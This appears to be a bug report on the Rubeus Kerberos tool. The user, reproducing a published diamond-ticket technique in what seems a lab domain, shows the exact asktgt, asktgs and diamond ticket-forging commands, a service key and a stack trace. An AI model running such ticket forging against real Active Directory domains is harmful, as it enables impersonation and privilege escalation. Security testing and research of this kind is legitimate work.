Description
Hello! I am reading this article https://www.huntress.com/blog/recutting-the-kerberos-diamond-ticket and trying to repeat the "Service ticket functionality" block. But it does not work as described. I do the following things:
- Ask for a TGT of a legitimate account:
```
.\Rubeus.exe asktgt /user:mirror /password:mirror /nowrap
```
Ok, it is good. Now, ask for a legitimate TGS:
```
.\Rubeus.exe asktgs /service:LDAP/dc1.domain.local,cifs/dc1.domain.local /ptt /ticket:doIE5DCCB....YWw= /nowrap
```
It is good too. And I try to modify the TGS for cifs/dc1. For example, I got this cmd from the article:
```
Rubeus.exe diamond /enctype:aes /domain:marvel.local /dc:earth-dc.marvel.local /ticketuser:thor /ticketuserid:1104 /ldap /ldapuser:loki /ldappassword:Mischief$ /nowrap /opsec /ticket:<output_of_service_ticket> /service:<SPN> /servicekey:<aes256_service_key>
```
I made the next cmd. 6447b....37818ef is the AES256 key of the DC1$ account (as the service account). 1118 is the id of the "mirror" user.
```
.\Rubeus.exe diamond /enctype:aes /domain:domain.local /dc:dc1.domain.local /ticketuser:mirror /ticketuserid:1118 /ldap /ldapuser:mirror /ldappassword:mirror /nowrap /service:cifs/dc1.domain.local /servicekey:6447b...37818ef /ticket:doIFK......
```
I expected stdout about the ldap connect (as in the article), but no. It fails on the AS-REQ step. Why is Rubeus doing this? A ready TGS is given to it, but Rubeus needs a TGT?
```
[*] Action: Diamond Ticket
[*] Using domain controller: dc1.domain.local (192.168.56.3)
[*] Using aes256_cts_hmac_sha1 hash:
[*] Building AS-REQ (w/ preauth) for: 'domain.local'
[!] Unhandled Rubeus exception:
System.ComponentModel.Win32Exception (0x80004005): Unknown error (0xc000000d)
   at Rubeus.Crypto.KerberosEncrypt(KERB_ETYPE eType, Int32 keyUsage, Byte[] key, Byte[] data)
   at Rubeus.PA_DATA..ctor(String keyString, KERB_ETYPE etype)
   at Rubeus.AS_REQ..ctor(String keyString, KERB_ETYPE etype, Boolean opsec, Boolean pac)
   at Rubeus.AS_REQ.NewASReq(String userName, String domain, String keyString, KERB_ETYPE etype, Boolean opsec, Boolean changepw, Boolean pac, String service, KERB_ETYPE suppEtype, String principalType)
   at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean opsec, String servicekey, Boolean changepw, Boolean pac, String proxyUrl, String service, KERB_ETYPE suppEtype, String principalType)
   at Rubeus.ForgeTickets.DiamondTicket(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, String krbKey, String ticketUser, String groups, Int32 ticketUserId, String sids)
   at Rubeus.Commands.Diamond.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
PS C:\Users\rdpuser>
```
The error is gone if I add the params /user and /password, and then Rubeus really asks for a TGT and fails because I don't give it a krbtgt key. This is wrong behavior. It must modify the TGS, not require a new TGT.
How can I fix it? Am I doing something wrong? Or maybe I could roll back some commits and get a Rubeus without this error (the version the article author worked with)?
Thanks.